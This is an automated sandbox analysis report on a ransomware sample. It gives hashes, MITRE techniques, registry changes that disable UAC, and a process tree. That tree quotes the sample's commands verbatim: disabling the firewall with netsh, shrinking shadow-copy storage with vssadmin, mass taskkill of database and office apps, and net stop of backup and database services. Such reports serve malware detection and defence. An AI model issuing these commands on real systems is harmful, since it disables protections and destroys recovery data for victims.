4d0dabf226858d79c903e62f4422e95263f9c184f2c286e96a1d09560f44b6ec

Analysis

max time kernel
62s
max time network
66s
platform
windows7_x64
resource
win7
submitted
22/07/2020, 08:54

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Deniz_K_z_.bin.exe
Size

3.4MB
MD5

fc78e6e58352151fb77a4b92f239d381
SHA1

4dda3af9601922394f0c16713180beb2ec88c050
SHA256

c8d49d874454bf1fa50cb7e4c00677e028af38e1d22e41476634d5d5a349cd7e
SHA512

4df0c69609087abc21be95574b6b09ff12253177a1dfee101ae7e24aa754d494fc837c41cfe636a686b644c9ebe7bf79fe805478ed75ee66a183208f7b3ca489

Score

10^/10

evasion trojan persistence ransomware

Malware Config

Signatures

UAC bypass 3 TTPs
evasion trojan

Bypass User Account Control
T1088

Disabling Security Tools
T1089

Modify Registry
T1112

Checks whether UAC is enabled 1 TTPs 1 IoCs

evasion trojan

System Information Discovery

T1082

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	Deniz_K_z_.bin.exe

Runs net.exe

Modifies service 2 TTPs 9 IoCs

persistence

Modify Registry

T1112

Modify Existing Service

T1031

description	ioc	Process
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\NapAgent\Shas	netsh.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\NapAgent\Qecs	netsh.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer	vssvc.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer	vssvc.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\napagent\LocalConfig\Enroll\HcsGroups	netsh.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\napagent\LocalConfig\UI	netsh.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer	vssvc.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer	vssvc.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\NapAgent\LocalConfig	netsh.exe

Disables Task Manager via registry modification
evasion

Drops file in Drivers directory 1 IoCs

description	ioc	Process
File created	C:\Windows\System32\drivers\etc\host	Deniz_K_z_.bin.exe

Suspicious use of WriteProcessMemory 236 IoCs

description	pid	Process	procid_target
PID 824 wrote to memory of 1412	824	Deniz_K_z_.bin.exe	24
PID 824 wrote to memory of 1412	824	Deniz_K_z_.bin.exe	24
PID 824 wrote to memory of 1412	824	Deniz_K_z_.bin.exe	24
PID 824 wrote to memory of 1412	824	Deniz_K_z_.bin.exe	24
PID 824 wrote to memory of 1440	824	Deniz_K_z_.bin.exe	26
PID 824 wrote to memory of 1440	824	Deniz_K_z_.bin.exe	26
PID 824 wrote to memory of 1440	824	Deniz_K_z_.bin.exe	26
PID 824 wrote to memory of 1440	824	Deniz_K_z_.bin.exe	26
PID 824 wrote to memory of 864	824	Deniz_K_z_.bin.exe	28
PID 824 wrote to memory of 864	824	Deniz_K_z_.bin.exe	28
PID 824 wrote to memory of 864	824	Deniz_K_z_.bin.exe	28
PID 824 wrote to memory of 864	824	Deniz_K_z_.bin.exe	28
PID 824 wrote to memory of 796	824	Deniz_K_z_.bin.exe	29
PID 824 wrote to memory of 796	824	Deniz_K_z_.bin.exe	29
PID 824 wrote to memory of 796	824	Deniz_K_z_.bin.exe	29
PID 824 wrote to memory of 796	824	Deniz_K_z_.bin.exe	29
PID 1412 wrote to memory of 360	1412	cmd.exe	31
PID 1412 wrote to memory of 360	1412	cmd.exe	31
PID 1412 wrote to memory of 360	1412	cmd.exe	31
PID 1412 wrote to memory of 360	1412	cmd.exe	31
PID 1440 wrote to memory of 1068	1440	cmd.exe	32
PID 1440 wrote to memory of 1068	1440	cmd.exe	32
PID 1440 wrote to memory of 1068	1440	cmd.exe	32
PID 1440 wrote to memory of 1068	1440	cmd.exe	32
PID 864 wrote to memory of 1064	864	cmd.exe	33
PID 864 wrote to memory of 1064	864	cmd.exe	33
PID 864 wrote to memory of 1064	864	cmd.exe	33
PID 864 wrote to memory of 1064	864	cmd.exe	33
PID 824 wrote to memory of 1828	824	Deniz_K_z_.bin.exe	35
PID 824 wrote to memory of 1828	824	Deniz_K_z_.bin.exe	35
PID 824 wrote to memory of 1828	824	Deniz_K_z_.bin.exe	35
PID 824 wrote to memory of 1828	824	Deniz_K_z_.bin.exe	35
PID 824 wrote to memory of 1848	824	Deniz_K_z_.bin.exe	38
PID 824 wrote to memory of 1848	824	Deniz_K_z_.bin.exe	38
PID 824 wrote to memory of 1848	824	Deniz_K_z_.bin.exe	38
PID 824 wrote to memory of 1848	824	Deniz_K_z_.bin.exe	38
PID 796 wrote to memory of 1184	796	cmd.exe	39
PID 796 wrote to memory of 1184	796	cmd.exe	39
PID 796 wrote to memory of 1184	796	cmd.exe	39
PID 796 wrote to memory of 1184	796	cmd.exe	39
PID 824 wrote to memory of 1780	824	Deniz_K_z_.bin.exe	41
PID 824 wrote to memory of 1780	824	Deniz_K_z_.bin.exe	41
PID 824 wrote to memory of 1780	824	Deniz_K_z_.bin.exe	41
PID 824 wrote to memory of 1780	824	Deniz_K_z_.bin.exe	41
PID 1828 wrote to memory of 1764	1828	cmd.exe	42
PID 1828 wrote to memory of 1764	1828	cmd.exe	42
PID 1828 wrote to memory of 1764	1828	cmd.exe	42
PID 1828 wrote to memory of 1764	1828	cmd.exe	42
PID 1764 wrote to memory of 1620	1764	net.exe	44
PID 1764 wrote to memory of 1620	1764	net.exe	44
PID 1764 wrote to memory of 1620	1764	net.exe	44
PID 1764 wrote to memory of 1620	1764	net.exe	44
PID 1848 wrote to memory of 1588	1848	cmd.exe	45
PID 1848 wrote to memory of 1588	1848	cmd.exe	45
PID 1848 wrote to memory of 1588	1848	cmd.exe	45
PID 1848 wrote to memory of 1588	1848	cmd.exe	45
PID 1780 wrote to memory of 1552	1780	cmd.exe	46
PID 1780 wrote to memory of 1552	1780	cmd.exe	46
PID 1780 wrote to memory of 1552	1780	cmd.exe	46
PID 1780 wrote to memory of 1552	1780	cmd.exe	46
PID 1828 wrote to memory of 1904	1828	cmd.exe	47
PID 1828 wrote to memory of 1904	1828	cmd.exe	47
PID 1828 wrote to memory of 1904	1828	cmd.exe	47
PID 1828 wrote to memory of 1904	1828	cmd.exe	47
PID 1904 wrote to memory of 1916	1904	net.exe	48
PID 1904 wrote to memory of 1916	1904	net.exe	48
PID 1904 wrote to memory of 1916	1904	net.exe	48
PID 1904 wrote to memory of 1916	1904	net.exe	48
PID 1828 wrote to memory of 1992	1828	cmd.exe	50
PID 1828 wrote to memory of 1992	1828	cmd.exe	50
PID 1828 wrote to memory of 1992	1828	cmd.exe	50
PID 1828 wrote to memory of 1992	1828	cmd.exe	50
PID 1992 wrote to memory of 1972	1992	net.exe	51
PID 1992 wrote to memory of 1972	1992	net.exe	51
PID 1992 wrote to memory of 1972	1992	net.exe	51
PID 1992 wrote to memory of 1972	1992	net.exe	51
PID 1780 wrote to memory of 1168	1780	cmd.exe	52
PID 1780 wrote to memory of 1168	1780	cmd.exe	52
PID 1780 wrote to memory of 1168	1780	cmd.exe	52
PID 1780 wrote to memory of 1168	1780	cmd.exe	52
PID 1828 wrote to memory of 828	1828	cmd.exe	53
PID 1828 wrote to memory of 828	1828	cmd.exe	53
PID 1828 wrote to memory of 828	1828	cmd.exe	53
PID 1828 wrote to memory of 828	1828	cmd.exe	53
PID 828 wrote to memory of 2040	828	net.exe	54
PID 828 wrote to memory of 2040	828	net.exe	54
PID 828 wrote to memory of 2040	828	net.exe	54
PID 828 wrote to memory of 2040	828	net.exe	54
PID 1828 wrote to memory of 1492	1828	cmd.exe	55
PID 1828 wrote to memory of 1492	1828	cmd.exe	55
PID 1828 wrote to memory of 1492	1828	cmd.exe	55
PID 1828 wrote to memory of 1492	1828	cmd.exe	55
PID 796 wrote to memory of 108	796	cmd.exe	56
PID 796 wrote to memory of 108	796	cmd.exe	56
PID 796 wrote to memory of 108	796	cmd.exe	56
PID 796 wrote to memory of 108	796	cmd.exe	56
PID 1492 wrote to memory of 1072	1492	net.exe	57
PID 1492 wrote to memory of 1072	1492	net.exe	57
PID 1492 wrote to memory of 1072	1492	net.exe	57
PID 1492 wrote to memory of 1072	1492	net.exe	57
PID 1828 wrote to memory of 1840	1828	cmd.exe	58
PID 1828 wrote to memory of 1840	1828	cmd.exe	58
PID 1828 wrote to memory of 1840	1828	cmd.exe	58
PID 1828 wrote to memory of 1840	1828	cmd.exe	58
PID 1840 wrote to memory of 1776	1840	net.exe	59
PID 1840 wrote to memory of 1776	1840	net.exe	59
PID 1840 wrote to memory of 1776	1840	net.exe	59
PID 1840 wrote to memory of 1776	1840	net.exe	59
PID 1828 wrote to memory of 1644	1828	cmd.exe	61
PID 1828 wrote to memory of 1644	1828	cmd.exe	61
PID 1828 wrote to memory of 1644	1828	cmd.exe	61
PID 1828 wrote to memory of 1644	1828	cmd.exe	61
PID 796 wrote to memory of 1064	796	cmd.exe	62
PID 796 wrote to memory of 1064	796	cmd.exe	62
PID 796 wrote to memory of 1064	796	cmd.exe	62
PID 796 wrote to memory of 1064	796	cmd.exe	62
PID 1644 wrote to memory of 1596	1644	net.exe	63
PID 1644 wrote to memory of 1596	1644	net.exe	63
PID 1644 wrote to memory of 1596	1644	net.exe	63
PID 1644 wrote to memory of 1596	1644	net.exe	63
PID 1828 wrote to memory of 1764	1828	cmd.exe	64
PID 1828 wrote to memory of 1764	1828	cmd.exe	64
PID 1828 wrote to memory of 1764	1828	cmd.exe	64
PID 1828 wrote to memory of 1764	1828	cmd.exe	64
PID 1764 wrote to memory of 1300	1764	net.exe	65
PID 1764 wrote to memory of 1300	1764	net.exe	65
PID 1764 wrote to memory of 1300	1764	net.exe	65
PID 1764 wrote to memory of 1300	1764	net.exe	65
PID 796 wrote to memory of 824	796	cmd.exe	66
PID 796 wrote to memory of 824	796	cmd.exe	66
PID 796 wrote to memory of 824	796	cmd.exe	66
PID 796 wrote to memory of 824	796	cmd.exe	66
PID 1828 wrote to memory of 1892	1828	cmd.exe	67
PID 1828 wrote to memory of 1892	1828	cmd.exe	67
PID 1828 wrote to memory of 1892	1828	cmd.exe	67
PID 1828 wrote to memory of 1892	1828	cmd.exe	67
PID 1892 wrote to memory of 1948	1892	net.exe	68
PID 1892 wrote to memory of 1948	1892	net.exe	68
PID 1892 wrote to memory of 1948	1892	net.exe	68
PID 1892 wrote to memory of 1948	1892	net.exe	68
PID 1828 wrote to memory of 1896	1828	cmd.exe	69
PID 1828 wrote to memory of 1896	1828	cmd.exe	69
PID 1828 wrote to memory of 1896	1828	cmd.exe	69
PID 1828 wrote to memory of 1896	1828	cmd.exe	69
PID 1896 wrote to memory of 1964	1896	net.exe	70
PID 1896 wrote to memory of 1964	1896	net.exe	70
PID 1896 wrote to memory of 1964	1896	net.exe	70
PID 1896 wrote to memory of 1964	1896	net.exe	70
PID 1828 wrote to memory of 1080	1828	cmd.exe	71
PID 1828 wrote to memory of 1080	1828	cmd.exe	71
PID 1828 wrote to memory of 1080	1828	cmd.exe	71
PID 1828 wrote to memory of 1080	1828	cmd.exe	71
PID 796 wrote to memory of 2036	796	cmd.exe	72
PID 796 wrote to memory of 2036	796	cmd.exe	72
PID 796 wrote to memory of 2036	796	cmd.exe	72
PID 796 wrote to memory of 2036	796	cmd.exe	72
PID 1080 wrote to memory of 1648	1080	net.exe	73
PID 1080 wrote to memory of 1648	1080	net.exe	73
PID 1080 wrote to memory of 1648	1080	net.exe	73
PID 1080 wrote to memory of 1648	1080	net.exe	73
PID 1828 wrote to memory of 1560	1828	cmd.exe	74
PID 1828 wrote to memory of 1560	1828	cmd.exe	74
PID 1828 wrote to memory of 1560	1828	cmd.exe	74
PID 1828 wrote to memory of 1560	1828	cmd.exe	74
PID 1560 wrote to memory of 1608	1560	net.exe	75
PID 1560 wrote to memory of 1608	1560	net.exe	75
PID 1560 wrote to memory of 1608	1560	net.exe	75
PID 1560 wrote to memory of 1608	1560	net.exe	75
PID 796 wrote to memory of 1868	796	cmd.exe	76
PID 796 wrote to memory of 1868	796	cmd.exe	76
PID 796 wrote to memory of 1868	796	cmd.exe	76
PID 796 wrote to memory of 1868	796	cmd.exe	76
PID 1828 wrote to memory of 1576	1828	cmd.exe	77
PID 1828 wrote to memory of 1576	1828	cmd.exe	77
PID 1828 wrote to memory of 1576	1828	cmd.exe	77
PID 1828 wrote to memory of 1576	1828	cmd.exe	77
PID 1576 wrote to memory of 1044	1576	net.exe	78
PID 1576 wrote to memory of 1044	1576	net.exe	78
PID 1576 wrote to memory of 1044	1576	net.exe	78
PID 1576 wrote to memory of 1044	1576	net.exe	78
PID 1828 wrote to memory of 1528	1828	cmd.exe	79
PID 1828 wrote to memory of 1528	1828	cmd.exe	79
PID 1828 wrote to memory of 1528	1828	cmd.exe	79
PID 1828 wrote to memory of 1528	1828	cmd.exe	79
PID 796 wrote to memory of 288	796	cmd.exe	80
PID 796 wrote to memory of 288	796	cmd.exe	80
PID 796 wrote to memory of 288	796	cmd.exe	80
PID 796 wrote to memory of 288	796	cmd.exe	80
PID 1528 wrote to memory of 1772	1528	net.exe	81
PID 1528 wrote to memory of 1772	1528	net.exe	81
PID 1528 wrote to memory of 1772	1528	net.exe	81
PID 1528 wrote to memory of 1772	1528	net.exe	81
PID 1828 wrote to memory of 1596	1828	cmd.exe	82
PID 1828 wrote to memory of 1596	1828	cmd.exe	82
PID 1828 wrote to memory of 1596	1828	cmd.exe	82
PID 1828 wrote to memory of 1596	1828	cmd.exe	82
PID 796 wrote to memory of 1428	796	cmd.exe	83
PID 796 wrote to memory of 1428	796	cmd.exe	83
PID 796 wrote to memory of 1428	796	cmd.exe	83
PID 796 wrote to memory of 1428	796	cmd.exe	83
PID 1596 wrote to memory of 1940	1596	net.exe	84
PID 1596 wrote to memory of 1940	1596	net.exe	84
PID 1596 wrote to memory of 1940	1596	net.exe	84
PID 1596 wrote to memory of 1940	1596	net.exe	84
PID 1828 wrote to memory of 792	1828	cmd.exe	85
PID 1828 wrote to memory of 792	1828	cmd.exe	85
PID 1828 wrote to memory of 792	1828	cmd.exe	85
PID 1828 wrote to memory of 792	1828	cmd.exe	85
PID 792 wrote to memory of 1544	792	net.exe	86
PID 792 wrote to memory of 1544	792	net.exe	86
PID 792 wrote to memory of 1544	792	net.exe	86
PID 792 wrote to memory of 1544	792	net.exe	86
PID 796 wrote to memory of 2024	796	cmd.exe	87
PID 796 wrote to memory of 2024	796	cmd.exe	87
PID 796 wrote to memory of 2024	796	cmd.exe	87
PID 796 wrote to memory of 2024	796	cmd.exe	87
PID 796 wrote to memory of 1472	796	cmd.exe	88
PID 796 wrote to memory of 1472	796	cmd.exe	88
PID 796 wrote to memory of 1472	796	cmd.exe	88
PID 796 wrote to memory of 1472	796	cmd.exe	88
PID 796 wrote to memory of 1992	796	cmd.exe	89
PID 796 wrote to memory of 1992	796	cmd.exe	89
PID 796 wrote to memory of 1992	796	cmd.exe	89
PID 796 wrote to memory of 1992	796	cmd.exe	89
PID 796 wrote to memory of 1888	796	cmd.exe	90
PID 796 wrote to memory of 1888	796	cmd.exe	90
PID 796 wrote to memory of 1888	796	cmd.exe	90
PID 796 wrote to memory of 1888	796	cmd.exe	90
PID 796 wrote to memory of 1256	796	cmd.exe	91
PID 796 wrote to memory of 1256	796	cmd.exe	91
PID 796 wrote to memory of 1256	796	cmd.exe	91
PID 796 wrote to memory of 1256	796	cmd.exe	91
PID 796 wrote to memory of 1564	796	cmd.exe	92
PID 796 wrote to memory of 1564	796	cmd.exe	92
PID 796 wrote to memory of 1564	796	cmd.exe	92
PID 796 wrote to memory of 1564	796	cmd.exe	92

Modifies Windows Firewall 1 TTPs
evasion

Modify Existing Service
T1031

Interacts with shadow copies 2 TTPs 3 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

T1107

Inhibit System Recovery

T1490

pid	Process
1068	vssadmin.exe
1064	vssadmin.exe
1552	vssadmin.exe

System policy modification 1 TTPs 17 IoCs

evasion

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	Deniz_K_z_.bin.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableSecureUIAPaths = "1"	Deniz_K_z_.bin.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\shutdownwithoutlogon = "1"	Deniz_K_z_.bin.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ValidateAdminCodeSignatures = "0"	Deniz_K_z_.bin.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableInstallerDetection = "1"	Deniz_K_z_.bin.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableUIADesktopToggle = "5"	Deniz_K_z_.bin.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\FilterAdministratorToken = "0"	Deniz_K_z_.bin.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\legalnoticecaption	Deniz_K_z_.bin.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "1"	Deniz_K_z_.bin.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\undockwithoutlogon = "1"	Deniz_K_z_.bin.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "5"	Deniz_K_z_.bin.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\dontdisplaylastusername = "0"	Deniz_K_z_.bin.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\legalnoticetext	Deniz_K_z_.bin.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\scforceoption = "0"	Deniz_K_z_.bin.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System	Deniz_K_z_.bin.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorUser = "3"	Deniz_K_z_.bin.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableVirtualization = "1"	Deniz_K_z_.bin.exe

Kills process with taskkill 14 IoCs

evasion

pid	Process
1868	taskkill.exe
288	taskkill.exe
1428	taskkill.exe
1992	taskkill.exe
1888	taskkill.exe
1256	taskkill.exe
824	taskkill.exe
1564	taskkill.exe
1064	taskkill.exe
2036	taskkill.exe
2024	taskkill.exe
1184	taskkill.exe
1472	taskkill.exe
108	taskkill.exe

Suspicious use of AdjustPrivilegeToken 58 IoCs

description	pid	Process
Token: SeBackupPrivilege	1700	vssvc.exe
Token: SeRestorePrivilege	1700	vssvc.exe
Token: SeAuditPrivilege	1700	vssvc.exe
Token: SeDebugPrivilege	1184	taskkill.exe
Token: SeIncreaseQuotaPrivilege	1168	WMIC.exe
Token: SeSecurityPrivilege	1168	WMIC.exe
Token: SeTakeOwnershipPrivilege	1168	WMIC.exe
Token: SeLoadDriverPrivilege	1168	WMIC.exe
Token: SeSystemProfilePrivilege	1168	WMIC.exe
Token: SeSystemtimePrivilege	1168	WMIC.exe
Token: SeProfSingleProcessPrivilege	1168	WMIC.exe
Token: SeIncBasePriorityPrivilege	1168	WMIC.exe
Token: SeCreatePagefilePrivilege	1168	WMIC.exe
Token: SeBackupPrivilege	1168	WMIC.exe
Token: SeRestorePrivilege	1168	WMIC.exe
Token: SeShutdownPrivilege	1168	WMIC.exe
Token: SeDebugPrivilege	1168	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1168	WMIC.exe
Token: SeRemoteShutdownPrivilege	1168	WMIC.exe
Token: SeUndockPrivilege	1168	WMIC.exe
Token: SeManageVolumePrivilege	1168	WMIC.exe
Token: 33	1168	WMIC.exe
Token: 34	1168	WMIC.exe
Token: 35	1168	WMIC.exe
Token: SeDebugPrivilege	108	taskkill.exe
Token: SeIncreaseQuotaPrivilege	1168	WMIC.exe
Token: SeSecurityPrivilege	1168	WMIC.exe
Token: SeTakeOwnershipPrivilege	1168	WMIC.exe
Token: SeLoadDriverPrivilege	1168	WMIC.exe
Token: SeSystemProfilePrivilege	1168	WMIC.exe
Token: SeSystemtimePrivilege	1168	WMIC.exe
Token: SeProfSingleProcessPrivilege	1168	WMIC.exe
Token: SeIncBasePriorityPrivilege	1168	WMIC.exe
Token: SeCreatePagefilePrivilege	1168	WMIC.exe
Token: SeBackupPrivilege	1168	WMIC.exe
Token: SeRestorePrivilege	1168	WMIC.exe
Token: SeShutdownPrivilege	1168	WMIC.exe
Token: SeDebugPrivilege	1168	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1168	WMIC.exe
Token: SeRemoteShutdownPrivilege	1168	WMIC.exe
Token: SeUndockPrivilege	1168	WMIC.exe
Token: SeManageVolumePrivilege	1168	WMIC.exe
Token: 33	1168	WMIC.exe
Token: 34	1168	WMIC.exe
Token: 35	1168	WMIC.exe
Token: SeDebugPrivilege	1064	taskkill.exe
Token: SeDebugPrivilege	824	taskkill.exe
Token: SeDebugPrivilege	2036	taskkill.exe
Token: SeDebugPrivilege	1868	taskkill.exe
Token: SeDebugPrivilege	288	taskkill.exe
Token: SeDebugPrivilege	1428	taskkill.exe
Token: SeDebugPrivilege	1588	powershell.exe
Token: SeDebugPrivilege	2024	taskkill.exe
Token: SeDebugPrivilege	1472	taskkill.exe
Token: SeDebugPrivilege	1992	taskkill.exe
Token: SeDebugPrivilege	1888	taskkill.exe
Token: SeDebugPrivilege	1256	taskkill.exe
Token: SeDebugPrivilege	1564	taskkill.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
1588	powershell.exe
1588	powershell.exe

Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490

C:\Users\Admin\AppData\Local\Temp\Deniz_K_z_.bin.exe
"C:\Users\Admin\AppData\Local\Temp\Deniz_K_z_.bin.exe"
1⤵
- Checks whether UAC is enabled
- Drops file in Drivers directory
- Suspicious use of WriteProcessMemory
- System policy modification
PID:824
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C netsh firewall set opmode disable
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1412
- - C:\Windows\SysWOW64\netsh.exe
    netsh firewall set opmode disable
    3⤵
    - Modifies service
    PID:360
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C vssadmin resize shadowstorage /for=C: /on=C: /maxsize=401MB
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1440
- - C:\Windows\SysWOW64\vssadmin.exe
    vssadmin resize shadowstorage /for=C: /on=C: /maxsize=401MB
    3⤵
    - Interacts with shadow copies
    PID:1068
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C vssadmin resize shadowstorage /for=C: /on=C: /maxsize=unbounded
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:864
- - C:\Windows\SysWOW64\vssadmin.exe
    vssadmin resize shadowstorage /for=C: /on=C: /maxsize=unbounded
    3⤵
    - Interacts with shadow copies
    PID:1064
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C taskkill /f /im sql.* & taskkill /f /im winword.* & taskkill /f /im wordpad.* & taskkill /f /im outlook.* & taskkill /f /im thunderbird.* & taskkill /f /im oracle.* & taskkill /f /im excel.* & taskkill /f /im onenote.* & taskkill /f /im virtualboxvm.* & taskkill /f /im node.* & taskkill /f /im QBW32.* & taskkill /f /im WBGX.* & taskkill /f /im Teams.* & taskkill /f /im Flow.*
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:796
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im sql.*
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1184
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im winword.*
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:108
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im wordpad.*
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1064
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im outlook.*
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:824
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im thunderbird.*
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2036
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im oracle.*
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1868
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im excel.*
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:288
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im onenote.*
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1428
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im virtualboxvm.*
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2024
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im node.*
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1472
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im QBW32.*
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1992
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im WBGX.*
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1888
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im Teams.*
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1256
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im Flow.*
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1564
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C net stop DbxSvc & net stop OracleXETNSListener & net stop OracleServiceXE & net stop AcrSch2Svc & net stop AcronisAgent & net stop Apache2.4 & net stop SQLWriter & net stop MSSQL$SQLEXPRESS & net stop MSSQLServerADHelper100 & net stop MongoDB & net stop SQLAgent$SQLEXPRESS & net stop SQLBrowser & net stop CobianBackup11 & net stop cbVSCService11 & net stop QBCFMontorService & net stop QBVSS
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1828
- - C:\Windows\SysWOW64\net.exe
    net stop DbxSvc
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1764
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop DbxSvc
      4⤵
      PID:1620
- - C:\Windows\SysWOW64\net.exe
    net stop OracleXETNSListener
    3⤵
    PID:1904
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop OracleXETNSListener
      4⤵
      PID:1916
- - C:\Windows\SysWOW64\net.exe
    net stop OracleServiceXE
    3⤵
    PID:1992
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop OracleServiceXE
      4⤵
      PID:1972
- - C:\Windows\SysWOW64\net.exe
    net stop AcrSch2Svc
    3⤵
    PID:828
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop AcrSch2Svc
      4⤵
      PID:2040
- - C:\Windows\SysWOW64\net.exe
    net stop AcronisAgent
    3⤵
    PID:1492
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop AcronisAgent
      4⤵
      PID:1072
- - C:\Windows\SysWOW64\net.exe
    net stop Apache2.4
    3⤵
    PID:1840
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop Apache2.4
      4⤵
      PID:1776
- - C:\Windows\SysWOW64\net.exe
    net stop SQLWriter
    3⤵
    PID:1644
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop SQLWriter
      4⤵
      PID:1596
- - C:\Windows\SysWOW64\net.exe
    net stop MSSQL$SQLEXPRESS
    3⤵
    PID:1764
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop MSSQL$SQLEXPRESS
      4⤵
      PID:1300
- - C:\Windows\SysWOW64\net.exe
    net stop MSSQLServerADHelper100
    3⤵
    PID:1892
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop MSSQLServerADHelper100
      4⤵
      PID:1948
- - C:\Windows\SysWOW64\net.exe
    net stop MongoDB
    3⤵
    PID:1896
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop MongoDB
      4⤵
      PID:1964
